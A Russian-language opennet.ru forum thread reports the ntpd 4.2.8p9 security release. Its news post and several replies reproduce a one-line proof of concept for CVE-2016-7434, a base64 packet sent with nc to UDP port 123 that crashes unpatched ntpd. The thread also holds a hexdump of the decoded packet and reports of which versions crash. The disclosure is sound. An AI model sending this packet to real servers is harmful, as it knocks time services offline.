forum.opennet.ru - "Выпуск ntpd 4.2.8p9 с устранением уязвимостей " (9)

форумы

помощь

поиск

регистрация

вход/выход

слежка

"Выпуск ntpd 4.2.8p9 с устранением уязвимостей "

Форум Разговоры, обсуждение новостей
Вариант для распечатки		Пред. тема \| След. тема
Изначальное сообщение		[ Отслеживать ]

"Выпуск ntpd 4.2.8p9 с устранением уязвимостей "	+/–
Сообщение от opennews (ok) on 24-Ноя-16, 11:23
Доступен (http://www.ntp.org/downloads.html) корректирующий выпуск сервера для синхронизации точного времени NTP 4.2.8p9, в котором устранено 10 уязвимостей (http://support.ntp.org/bin/view/Main/SecurityNotice#November...), которые могут привести к отказу в обслуживании, путём исчерпания доступных ресурсов или инициирования краха процесса. Одна из уязвимостей (http://bugs.ntp.org/show_bug.cgi?id=3082) (CVE-2016-7434) достаточно проста в эксплуатации (http://dumpco.re/cve-2016-7434/) и может привести к краху процесса ntpd при отправке специально оформленного пакета без необходимости прохождения аутентификации (проблема проявляется на ранней стадии соединения): echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY"\ "WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" \| base64 -d \| nc -u -v 127.0.0.1 123 URL: http://www.kb.cert.org/vuls/id/633847 Новость: http://www.opennet.me/opennews/art.shtml?num=45553
Ответить \| Правка \| Cообщить модератору

Оглавление

Выпуск ntpd 4.2.8p9 с устранением уязвимостей , freehck, 11:23 , 24-Ноя-16, (1) +2

Выпуск ntpd 4.2.8p9 с устранением уязвимостей , burik666, 12:45 , 24-Ноя-16, (2)

Выпуск ntpd 4.2.8p9 с устранением уязвимостей , wd, 13:33 , 24-Ноя-16, (3) +2

Выпуск ntpd 4.2.8p9 с устранением уязвимостей , burik666, 13:59 , 24-Ноя-16, (4)

Выпуск ntpd 4.2.8p9 с устранением уязвимостей , pavlinux, 03:21 , 27-Ноя-16, (8) –1

Выпуск ntpd 4.2.8p9 с устранением уязвимостей , Аноним, 16:37 , 24-Ноя-16, (5)

Выпуск ntpd 4.2.8p9 с устранением уязвимостей , rt, 22:35 , 24-Ноя-16, (6) +3

Выпуск ntpd 4.2.8p9 с устранением уязвимостей , Аноним, 12:40 , 25-Ноя-16, (7) –1

Выпуск ntpd 4.2.8p9 с устранением уязвимостей , SysA, 11:37 , 28-Ноя-16, (9)

Сообщения по теме [Сортировка по времени | RSS]

1. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей " +2 +/–

Сообщение от freehck (ok) on 24-Ноя-16, 11:23

При копировании команды имейте в виду, что на opennet отступы для блоков кода дополнительные ставятся, что приводит к появлению пробела посреди строки. ;)
echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsYWRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA="

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

2. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей " +/–

Сообщение от burik666 (ok) on 24-Ноя-16, 12:45

echo "6nonce, laddr=[]:Hrags=32, laddr=[]:WOP2, laddr=[]:WOP"

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

3. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей " +2 +/–

Сообщение от wd on 24-Ноя-16, 13:33

wd ~ % echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsYWRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" |base64 -d |hexdump -C
00000000  16 0a 00 10 00 00 00 00  00 00 00 36 6e 6f 6e 63  |...........6nonc|
00000010  65 2c 20 6c 61 64 64 72  3d 5b 5d 3a 48 72 61 67  |e, laddr=[]:Hrag|
00000020  73 3d 33 32 2c 20 6c 61  64 64 72 3d 5b 5d 3a 57  |s=32, laddr=[]:W|
00000030  4f 50 00 32 2c 20 6c 61  64 64 72 3d 5b 5d 3a 57  |OP.2, laddr=[]:W|
00000040  4f 50 00 00                                       |OP..|

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

4. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей " +/–

Сообщение от burik666 (ok) on 24-Ноя-16, 13:59

точно! тупанул.

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

8. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей " –1 +/–

Сообщение от pavlinux (ok) on 27-Ноя-16, 03:21

> При копировании команды имейте в виду, что на opennet ...
UNIX-way - printf

printf "%q" "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY"\
    "WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" | base64 -d | nc -u -v 127.0.0.1 123

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

5. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей " +/–

Сообщение от Аноним (??) on 24-Ноя-16, 16:37

в этот раз на слаке апдейт завезли быстро

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

6. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей " +3 +/–

Сообщение от rt (??) on 24-Ноя-16, 22:35

Потрясающе!

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

7. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей " –1 +/–

Сообщение от Аноним (??) on 25-Ноя-16, 12:40

Gentoo, ntp 4.2.8p8 - не крашится

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

9. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей " +/–

Сообщение от SysA on 28-Ноя-16, 11:37

К сожалению ты неправ!
Крашится, но v4.2.8_p9 - нет.

Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру

1. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "	+2 +/–
Сообщение от freehck (ok) on 24-Ноя-16, 11:23
При копировании команды имейте в виду, что на opennet отступы для блоков кода дополнительные ставятся, что приводит к появлению пробела посреди строки. ;) echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsYWRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA="
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору


	2. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "	+/–
	Сообщение от burik666 (ok) on 24-Ноя-16, 12:45
	echo "6nonce, laddr=[]:Hrags=32, laddr=[]:WOP2, laddr=[]:WOP"
	Ответить \| Правка \| ^ к родителю #1 \| Наверх \| Cообщить модератору


	3. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "	+2 +/–
	Сообщение от wd on 24-Ноя-16, 13:33
	wd ~ % echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsYWRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" \|base64 -d \|hexdump -C 00000000 16 0a 00 10 00 00 00 00 00 00 00 36 6e 6f 6e 63 \|...........6nonc\| 00000010 65 2c 20 6c 61 64 64 72 3d 5b 5d 3a 48 72 61 67 \|e, laddr=[]:Hrag\| 00000020 73 3d 33 32 2c 20 6c 61 64 64 72 3d 5b 5d 3a 57 \|s=32, laddr=[]:W\| 00000030 4f 50 00 32 2c 20 6c 61 64 64 72 3d 5b 5d 3a 57 \|OP.2, laddr=[]:W\| 00000040 4f 50 00 00 \|OP..\|
	Ответить \| Правка \| ^ к родителю #2 \| Наверх \| Cообщить модератору


	4. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "	+/–
	Сообщение от burik666 (ok) on 24-Ноя-16, 13:59
	точно! тупанул.
	Ответить \| Правка \| ^ к родителю #3 \| Наверх \| Cообщить модератору


	8. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "	–1 +/–
	Сообщение от pavlinux (ok) on 27-Ноя-16, 03:21
	> При копировании команды имейте в виду, что на opennet ... UNIX-way - printf printf "%q" "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY"\ "WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" \| base64 -d \| nc -u -v 127.0.0.1 123
	Ответить \| Правка \| ^ к родителю #1 \| Наверх \| Cообщить модератору

5. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "	+/–
Сообщение от Аноним (??) on 24-Ноя-16, 16:37
в этот раз на слаке апдейт завезли быстро
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору


	6. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "	+3 +/–
	Сообщение от rt (??) on 24-Ноя-16, 22:35
	Потрясающе!
	Ответить \| Правка \| ^ к родителю #5 \| Наверх \| Cообщить модератору

7. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "	–1 +/–
Сообщение от Аноним (??) on 25-Ноя-16, 12:40
Gentoo, ntp 4.2.8p8 - не крашится
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору


	9. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "	+/–
	Сообщение от SysA on 28-Ноя-16, 11:37
	К сожалению ты неправ! Крашится, но v4.2.8_p9 - нет.
	Ответить \| Правка \| ^ к родителю #7 \| Наверх \| Cообщить модератору